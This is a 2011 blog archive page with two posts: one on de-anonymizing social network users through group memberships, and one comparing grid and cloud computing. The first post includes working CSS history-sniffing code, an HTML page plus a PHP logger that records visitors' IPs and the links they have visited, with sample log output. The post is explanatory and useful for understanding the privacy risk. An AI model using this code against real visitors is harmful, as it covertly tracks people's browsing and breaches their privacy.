Nabeel's Blog: April 2011

Wednesday, April 27, 2011

De-anonymizing social network users

Recently read an interesting paper about de-anaonymizing social network users that appeared in last year's S&P. The idea is quite simple: the groups a user belongs act as a fingerprint of the user (aka group fingerprint of a user); in other words, the set of group a user belongs allows to identify a user uniquely. Most of the social networks provide the ability to be (or not to be) a member of groups. If an attacker can get hold of the group membership information of a user from these social networks, then it can uniquely identify the user (e.g. associate an IP address with a specific user). How to steal the group membership information? They use another simple technique to do this; use an existing technique to steal user browser history.

I initially thought you've got to have javascript enabled in order to steal user browser history (you are still not safe even if you disable javascript!). I was curious to find out how to do without javascripts. You can do a simple CSS trick to steal the browser history (an online example). The idea is quite simple. In your style sheet, you specify which URL's you want to track. Then you use some kind of a social engineering trick for the user to open your malicious page. For the user there is nothing visible, it is an innocuous html page; but it simply checks browser history and if the user had happened to have visited some of the links listed in the page, it sends a message back to the malicious server. Then the malicious server knows which links user visited.

For example,
This is a simple malicious page html page that I want to get a user to open:


<html>
<body>
<style>
span.s1 a:visited {
background:url(visited.php?t=http%3A//http.google.com);
}
span.s2 a:visited {
background:url(visited.php?t=http%3A//http.dailymirror.lk);
}
</style>

<span class="s1">
<a href="http://www.google.com">www.google.com</a>
</span>
<br/>
<span class="s2">
<a href="http://www.dailymirror.lk">www.dailymirror.lk</a>
</span>
</body>
</html>

And I have a small malicious php file which write to a txt if the user has visited a specific link:

<?php
$client = $_SERVER['REMOTE_ADDR'];

$fp = fopen("history.txt", "a");
$str = $client . " has accessed " . $_GET['t'] . "\n";
fwrite($fp, $str);
fclose($fp);
?>

The history.txt file has something like:
205.10.1.1 has accessed http://www.google.com
210.34.5.11 has accessed http://www.google.com
210.34.5.11 has accessed http://www.dailymirror.lk

You get the idea. It is quite simple to launch this attack.

Found that this plug-in from Stanford said to protect your browser from visited link based attacks. (Update: this plug-in is no longer maintained. Only has an xpi for FF 2.0)

Friday, April 15, 2011

Grid vs. Cloud computing

In today's group meeting, we were discussing the security issues in the cloud computing paradigm. At the end of the meeting, I was confused about the difference between grid vs. cloud computing. Are they both refer to the same thing? Or Are they different? Or Are they have things in common? If it is the last case, what is common and what is different? So, I decided to look for the answer.

I am not familiar with grid computing, but Ian Foster et.al.'s 2008 paper titled "Cloud computing and grid computing 360-degree compared" helped to resolve some of the confusions I had in mind. This blog post is based on the material in that paper.

The following diagram shows the big picture of grid vs. cloud computing.

The following discussion is based on projects such as TeraGrid (grid computing) vs. commercially available Amazon EC2, Microsoft Azure (cloud computing).

How the resources are distributed?
To me both are the same from the distributed system point of view; both try to reduce the computing cost by using distributed cluster of computers. However, the main difference appear to be how the two approaches work. It is safe to say that, from a user's point of view, cloud computing is a centralized model whereas grid computing is a decentralized model where the computation could occur over many administrative domains.

Who controls?
In cloud computing (at least from what I have seen so far), one party has the control over the cluster of computers, whereas in grid computing, there is no one controller that can control all the nodes in the cluster. In other words, cloud computing allows a user/organization to build a virtual organization on a third party infrastructure where as grid computing tries to build a collaborative virtual organization that does not belong to one single entity.

How the on demand computation works?
Both have the notion of on demand computation. However, grid computing is more of an incentive model (e.g. if you provide computation resources, you also get computation resources from others who have already joined the grid/cluster), whereas in cloud computing there is no notion of incentive model. Cloud computing is more of a utility model like electricity consumption where you pay for what you use. One could argue that both have some kind of a utility model; in grid computing you trade your idle computation cycles, unused space, etc. with some other (same or different) resources available in the virtual network and in cloud computing, you trade your money for the resources available with a cloud provider.

I don't claim that the above description is fully correct. I may have looked at the topic from a narrow point of view. Please feel free to voice your opinion.